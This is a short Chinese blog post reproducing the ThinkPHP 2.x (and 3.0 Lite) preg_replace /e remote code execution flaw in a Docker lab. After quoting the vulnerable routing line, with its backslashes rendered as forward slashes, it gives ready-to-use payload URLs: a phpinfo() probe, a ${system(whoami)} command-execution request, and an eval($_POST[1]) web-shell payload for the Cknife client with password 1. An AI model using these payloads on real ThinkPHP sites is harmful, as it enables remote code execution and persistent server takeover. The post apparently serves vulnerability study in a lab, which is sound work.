ThinkPHP 2.x版本中,使用preg_replace
的/e
模式匹配路由:
$res = preg_replace('@(/w+)'.$depr.'([^'.$depr.'//]+)@e', '$var[/'//1/']="//2";', implode($depr,$paths));
导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。
ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。
环境搭建
执行如下命令启动ThinkPHP 2.1的Demo应用:
docker-compose up -d
环境启动后,访问http://your-ip:8080/
即可查看到默认页面。
漏洞复现
直接访问http://your-ip:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D
即可执行phpinfo()
:
任意代码执行
payload:
/index.php?s=/index/index/xxx/${system(whoami)}
Cknife连接,连接密码:1
http://192.168.10.128:8080//index.php?s=a/b/c/${@print(eval($_POST[1]))}
原创文章,作者:sunnyman218,如若转载,请注明出处:https://blog.ytso.com/272147.html